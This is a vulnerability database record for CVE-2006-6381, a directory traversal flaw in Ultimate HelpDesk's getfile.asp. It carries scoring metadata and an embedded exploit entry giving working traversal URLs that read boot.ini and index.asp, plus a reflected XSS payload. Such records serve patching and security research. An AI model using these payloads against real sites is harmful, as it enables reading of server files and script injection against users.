ID OSVDB:31730
Type osvdb
Reporter OSVDB
Modified 2006-12-01T11:03:46
Description
Manual Testing Notes
/getfile.asp?filename=../../../boot.ini
References:
Secunia Advisory ID:23225
Related OSVDB ID: 31729
ISS X-Force ID: 30722
Generic Exploit URL: http://milw0rm.com/exploits/2881
FrSIRT Advisory: ADV-2006-4819
CVE-2006-6381
{"href": "https://vulners.com/osvdb/OSVDB:31730", "id": "OSVDB:31730", "reporter": "OSVDB", "published": "2006-12-01T11:03:46", "description": "## Manual Testing Notes\n/getfile.asp?filename=../../../boot.ini\n## References:\n[Secunia Advisory ID:23225](https://secuniaresearch.flexerasoftware.com/advisories/23225/)\n[Related OSVDB ID: 31729](https://vulners.com/osvdb/OSVDB:31729)\nISS X-Force ID: 30722\nGeneric Exploit URL: http://milw0rm.com/exploits/2881\nFrSIRT Advisory: ADV-2006-4819\n[CVE-2006-6381](https://vulners.com/cve/CVE-2006-6381)\n", "title": "Ultimate HelpDesk getfile.asp filename Variable Traversal Arbitrary File Access", "lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "references": [], "edition": 1, "cvelist": ["CVE-2006-6381"], "affectedSoftware": [], "viewCount": 7, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2017-04-28T13:20:28", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-6381"]}, {"type": "exploitdb", "idList": ["EDB-ID:2881"]}], "modified": "2017-04-28T13:20:28", "rev": 2}, "vulnersScore": 6.5}, "modified": "2006-12-01T11:03:46"}
{"cve": [{"lastseen": "2021-02-02T05:27:26", "description": "Directory traversal vulnerability in getfile.asp in Ultimate HelpDesk allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter.", "edition": 4, "cvss3": {}, "published": "2006-12-07T21:28:00", "title": "CVE-2006-6381", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-6381"], "modified": "2017-10-19T01:29:00", "cpe": ["cpe:/a:ultimate_helpdesk:ultimate_helpdesk:*"], "id": "CVE-2006-6381", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6381", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ultimate_helpdesk:ultimate_helpdesk:*:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T17:14:20", "description": "Ultimate HelpDesk (XSS/Local File Disclosure) Vulnerabilities. CVE-2006-6380,CVE-2006-6381. Webapps exploit for asp platform", "published": "2006-12-01T00:00:00", "type": "exploitdb", "title": "Ultimate HelpDesk XSS/Local File Disclosure Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6381", "CVE-2006-6380"], "modified": "2006-12-01T00:00:00", "id": "EDB-ID:2881", "href": "https://www.exploit-db.com/exploits/2881/", "sourceData": "*******************************************************************************\n# Title : Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities\n# Author : ajann\n# Contact : :(\n\n*******************************************************************************\n\nLogin Before Vulnerabilities.:\n\n\n[[SOURCE]]]------------------------------------------------------\n\nhttp://[target]/[path]//getfile.asp?filename=[SQL]\n\nExample:\n\n//getfile.asp?filename=../index.asp\n//getfile.asp?filename=../../../boot.ini\n\n[[/SOURCE]]]\n\n\n[[XSS]]]---------------------------------------------------------\n\nhttp://[target]/[path]//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=[XSS]\n\nExample:\n\n//index.asp?status=open&page=tickets&title=39&searchparam=&u_input=&u_field=&intpage=2&keyword=%22%3E%3Cscript%3Ealert%28%27ajann%27%29%3B%3C%2Fscript%3E\n\n[[/XSS]]]\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# ajann,Turkey\n# ...\n\n# Im not Hacker!\n\n# milw0rm.com [2006-12-01]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2881/"}]}
